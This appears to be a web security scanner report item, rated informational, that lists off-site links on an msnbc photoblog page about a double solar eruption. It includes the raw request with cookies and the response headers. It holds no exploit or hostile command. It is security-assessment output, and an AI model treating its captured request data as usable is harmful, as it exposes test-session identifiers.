<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942494&amp;rand=901585916&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<div class="normal"><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="normal"><a href="http://fdpfg.newsvine.com/">fdpfg</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<p><a href="http://attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.250. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 18:07:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 191578

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
